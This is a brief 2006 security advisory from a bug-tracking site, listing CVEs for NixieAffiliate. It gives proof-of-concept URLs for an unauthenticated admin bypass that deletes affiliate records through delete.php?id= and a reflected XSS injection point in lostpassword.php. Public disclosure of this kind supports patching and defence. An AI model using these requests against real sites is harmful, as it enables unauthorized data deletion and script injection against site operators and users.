Bug: NixieAffiliate all version bypass admin and xss ( Ascii Version )

Search:
WLB2

NixieAffiliate all version bypass admin and xss

Published
Credit
Risk
2006.09.22
s3rv3r_hack3r
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-4895
CVE-2006-4894
No
Yes

NixieAffiliate all version

vendor : idevspot.com

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

Bypass for delete any aff ID :>>

www.domain.com/NixieAffiliate/delete.php?id=1

Xss :>>

www.domain.com/NixieAffiliate/forms/lostpassword.php?error=[xss]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version